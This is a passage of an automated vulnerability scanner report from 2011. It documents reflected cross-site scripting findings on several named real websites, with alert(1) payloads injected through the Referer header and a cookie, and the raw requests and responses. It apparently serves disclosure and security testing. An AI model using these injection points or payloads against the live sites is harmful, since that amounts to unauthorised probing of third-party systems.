Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.taste.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=114da'%3balert(1)//eb416820507

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/5.0.4
Content-Type: text/html; charset=UTF-8
Expires: Tue, 04 Oct 2011 21:51:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:51:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=0eencbfkpemgnkh8u8bqtbv7k4; path=/
Content-Length: 88064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<
...[SNIP]...
<strong>114da';alert(1)//eb416820507</strong>
...[SNIP]...

1.447. http://www.urbanspoon.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.urbanspoon.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74f12"-alert(1)-"ceef31e5d5a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.urbanspoon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=74f12"-alert(1)-"ceef31e5d5a

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 04 Oct 2011 21:19:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Last-Modified: Tue, 04 Oct 2011 21:19:21 GMT
X-Runtime: 308
X-Version: baeeeec
Content-Length: 60742
X-Spoon: usapp3
Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlNWZlNjk0MmU0MjNmNzI4MzE1MWNjYmZjMWJhYzY3ZjA%3D--6e1ff02ca3812cf9792dba52d358e7ef3938b5c3; path=/; expires=Mon, 04-Oct-2021 21:19:21 GMT; HttpOnly
Cache-Control: max-age=0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Dallas/Fort Wo
...[SNIP]...
<![CDATA[
DART_AD("http://ad.doubleclick.net/adi/6916.iac.us/other;s=us;pty=home;cst=0;sz=728x90;pos=bot;st=_tx;mtr=82079;kw=74f12"-alert(1)-"ceef31e5d5a;tile=" + dart_tile_counter++ + ";ord=" + dart_ord + "?", 728, 90);
//]]>
...[SNIP]...

1.448. http://www.urbanspoon.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.urbanspoon.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9223c'-alert(1)-'f4a1f57ca76 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 04 Oct 2011 21:19:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Last-Modified: Tue, 04 Oct 2011 21:19:24 GMT
X-Runtime: 168
X-Version: baeeeec
Content-Length: 60742
X-Spoon: usapp4
Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlNWZlNjk0MmU0MjNmNzI4MzE1MWNjYmZjMWJhYzY3ZjA%3D--6e1ff02ca3812cf9792dba52d358e7ef3938b5c3; path=/; expires=Mon, 04-Oct-2021 21:19:24 GMT; HttpOnly
Cache-Control: max-age=0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Dallas/Fort Wo
...[SNIP]...
<script type="text/javascript" src="http://ad.doubleclick.net/adj/6916.iac.us/other;s=us;pty=home;cst=0;sz=960x30;pos=top;st=_tx;mtr=82079;kw=9223c'-alert(1)-'f4a1f57ca76;tile='+ (dart_tile_counter++) + ';ord=' + dart_ord + '">
...[SNIP]...

1.449. http://seg.sharethis.com/getSegment.php [__stid cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload f58cb<script>alert(1)</script>b6f0d38712e was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.thedailybeast.com%2Farticles%2F2011%2F10%2F04%2Fthe-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html%3Fcid%3Daskmentrade&jsref=http%3A%2F%2Fwww.askmen.com%2F&rnd=1317758948687 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==f58cb<script>alert(1)</script>b6f0d38712e

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 04 Oct 2011 20:17:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1376

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">

...[SNIP]...
<div style='display:none'>clicookie:CqCKBE5ezzUzVT7FCnHuAg==f58cb<script>alert(1)</script>b6f0d38712e
userid:
</div>
...[SNIP]...

Report generated by XSS.CX at Wed Oct 05 09:00:35 CDT 2011.